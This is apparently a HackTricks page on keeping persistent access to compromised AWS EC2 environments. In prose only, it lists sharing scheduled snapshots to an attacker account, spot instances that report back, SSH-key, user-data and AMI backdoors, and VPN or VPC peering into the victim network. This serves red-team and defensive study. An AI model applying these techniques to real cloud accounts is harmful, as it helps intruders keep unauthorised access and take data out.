{% hint style="success" %}
Learn & practice AWS Hacking:.png)
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: .png)
HackTricks Training GCP Red Team Expert (GRTE).png)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
For more information check:
{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum {% endcontent-ref %}
If a defender finds that an EC2 instance was compromised he will probably try to isolate the network of the machine. He could do this with an explicit Deny NACL (but NACLs affect the entire subnet), or changing the security group not allowing any kind of inbound or outbound traffic.
If the attacker had a reverse shell originated from the machine, even if the SG is modified to not allow inboud or outbound traffic, the connection won't be killed due to Security Group Connection Tracking.
This service allow to schedule the creation of AMIs and snapshots and even share them with other accounts.
An attacker could configure the generation of AMIs or snapshots of all the images or all the volumes every week and share them with his account.
It's possible to schedule instances to run daily, weekly or even monthly. An attacker could run a machine with high privileges or interesting access where he could access.
Spot instances are cheaper than regular instances. An attacker could launch a small spot fleet request for 5 year (for example), with automatic IP assignment and a user data that sends to the attacker when the spot instance start and the IP address and with a high privileged IAM role.
An attacker could get access to the instances and backdoor them:
- Using a traditional rootkit for example
- Adding a new public SSH key (check EC2 privesc options)
- Backdooring the User Data
- Backdoor the used AMI
- Backdoor the User Data
- Backdoor the Key Pair
Create a VPN so the attacker will be able to connect directly through i to the VPC.
Create a peering connection between the victim VPC and the attacker VPC so he will be able to access the victim VPC.
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.